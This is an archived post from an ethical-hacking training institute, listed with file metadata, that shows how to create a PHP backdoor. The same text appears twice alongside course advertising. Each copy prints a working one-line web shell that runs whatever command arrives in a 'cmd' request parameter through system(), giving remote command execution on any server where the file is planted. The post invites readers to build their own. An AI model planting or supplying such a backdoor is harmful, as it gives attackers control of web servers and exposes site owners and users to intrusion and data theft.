Filename | Creating a simple backdoor in PHP |
Permission | rw-r--r-- |
Author | Unknown |
Date and Time | 7/15/2013 |
Label | Penetration |
Action |
Ethical Hacking Institute in Pune
./Arizona Team
Many times in CEH and LPT classes I have repeated that website security should be taken seriously. While many dont do so. Here in this thread I will show you how easy it is to create a backdoor in PHP.
Go through the logical flow of the program and create your own PHP backdoor. If you have any problem in the logical flow you can shoot your query to me at instructor@arizonainfotech.com
Here is the PHP code:
<?php
if(isset($_REQUEST['cmd'])){echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die;}
?>
www.arizonainfotech.com
CEH CHFI ECSA ENSA CCNA CCNA SECURITY MCITP RHCE CLOUD ANDROID IPHONE NETWORKING HARDWARE TRAINING INSTITUTE IN PUNE
./Arizona Team
Many times in CEH and LPT classes I have repeated that website security should be taken seriously. While many dont do so. Here in this thread I will show you how easy it is to create a backdoor in PHP.
Go through the logical flow of the program and create your own PHP backdoor. If you have any problem in the logical flow you can shoot your query to me at instructor@arizonainfotech.com
Here is the PHP code:
<?php
if(isset($_REQUEST['cmd'])){echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die;}
?>
www.arizonainfotech.com
CEH CHFI ECSA ENSA CCNA CCNA SECURITY MCITP RHCE CLOUD ANDROID IPHONE NETWORKING HARDWARE TRAINING INSTITUTE IN PUNE